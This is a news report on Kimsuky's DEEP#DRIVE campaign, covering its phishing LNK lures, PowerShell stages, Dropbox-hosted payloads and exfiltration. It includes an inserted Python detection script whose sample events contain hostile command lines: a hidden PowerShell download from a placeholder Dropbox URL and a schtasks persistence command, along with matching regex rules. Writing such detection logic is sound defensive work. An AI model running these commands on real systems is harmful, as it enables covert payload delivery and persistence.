North Korean APT43 Uses PowerShell and Dropbox in Targeted South Korea Cyberattacks

Feb 13, 2025 | Ravie Lakshmanan | United States

A nation-state threat actor with ties to North Korea has been linked to an ongoing campaign targeting South Korean business, government, and cryptocurrency sectors.

The attack campaign, dubbed DEEP#DRIVE by Securonix, has been attributed to a hacking group known as Kimsuky, which is also tracked under the names APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.

“Leveraging tailored phishing lures written in Korean and disguised as legitimate documents, the attackers successfully infiltrated targeted environments,” security researchers Den Iuzvyk and Tim Peck said in a report shared with The Hacker News, describing the activity as a “sophisticated and multi-stage operation.”

The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are disguised as work logs, insurance documents and crypto-related files to trick recipients into opening them, thereby triggering the infection process.

The attack chain is notable for its heavy reliance on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It is also characterized by the use of Dropbox for payload distribution and data exfiltration.

It all starts with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document, which, when extracted and launched, triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while stealthily establishing persistence on the Windows host via a scheduled task named “ChromeUpdateTaskMachine.”

One such lure document, written in Korean, pertains to a safety work plan for forklift operations at a logistics facility, delving into the safe handling of heavy cargo and outlining ways to ensure compliance with workplace safety standards.

The PowerShell script is also designed to contact the same Dropbox location to fetch another PowerShell script that is responsible for gathering and exfiltrating system information. Furthermore, it drops a third PowerShell script that is ultimately responsible for executing an unknown .NET assembly.
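The chain described above (explorer-launched PowerShell pulling from Dropbox, then a scheduled task named ChromeUpdateTaskMachine) can be turned into simple detection logic over process-creation telemetry. The Python below is an added example, not code from the Securonix report; the Sysmon-style records, rule names and the Dropbox path are constructed placeholders.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 fields), not real
# telemetry from the DEEP#DRIVE campaign; the Dropbox path is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -ep bypass -c "iwr https://dl.dropboxusercontent.com/EXAMPLE/lure.hwp -OutFile $env:TEMP\lure.hwp"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn ChromeUpdateTaskMachine /tr "powershell -w hidden -f C:\Users\Public\s.ps1" /sc minute /mo 5'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe --profile-directory=Default"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
DROPBOX_HOST = re.compile(r"https?://[^\s\"']*dropbox(usercontent|api)?\.com", re.I)
TASK_NAME = re.compile(r"/tn\s+\"?ChromeUpdateTaskMachine\"?", re.I)
HIDDEN_PS_ACTION = re.compile(r"/tr\s+\"?powershell[^\"]*-w(indowstyle)?\s+hidden", re.I)


def classify(event):
    """Return the list of rule names an event matches (empty if nothing fires)."""
    hits = []
    image, parent, cmd = event["Image"], event["ParentImage"], event["CommandLine"]
    is_schtasks = image.lower().endswith("\\schtasks.exe")
    # Rule 1: PowerShell spawned by explorer.exe (what a double-clicked .LNK looks
    # like) whose command line fetches something from Dropbox.
    if POWERSHELL.search(image) and parent.lower().endswith("\\explorer.exe") and DROPBOX_HOST.search(cmd):
        hits.append("lnk_powershell_dropbox_download")
    # Rule 2: persistence via the exact task name reported for this campaign.
    if is_schtasks and "/create" in cmd.lower() and TASK_NAME.search(cmd):
        hits.append("persistence_chromeupdatetaskmachine")
    # Rule 3: broader catch: any new scheduled task whose action is hidden PowerShell.
    if is_schtasks and HIDDEN_PS_ACTION.search(cmd):
        hits.append("schtask_hidden_powershell_action")
    return hits


def scan(events):
    """Run every rule over a batch of events; returns (event index, rule name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]


if __name__ == "__main__":
    for i, hit in scan(SAMPLE_EVENTS):
        print(f"event {i}: {hit}")
```

Rule 3 deliberately does not depend on the task name, since the name is trivially changed between campaigns while a hidden PowerShell action in a freshly registered task is rare on a workstation.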

“The use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance data, such as system information and active processes, to predetermined folders,” the researchers said.

“This cloud-based infrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing traditional IP or domain blocklists. Furthermore, the infrastructure appeared dynamic and short-lived, as evidenced by the rapid removal of key links after initial stages of the attack, a tactic that not only complicates analysis but also suggests the attackers actively monitor their campaigns for operational security.”

Securonix said it was able to leverage the OAuth tokens to gain further insights into the threat actor's infrastructure, finding evidence that the campaign may have been underway since September last year.

“Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker's intent to evade detection and complicate incident response,” the researchers concluded.
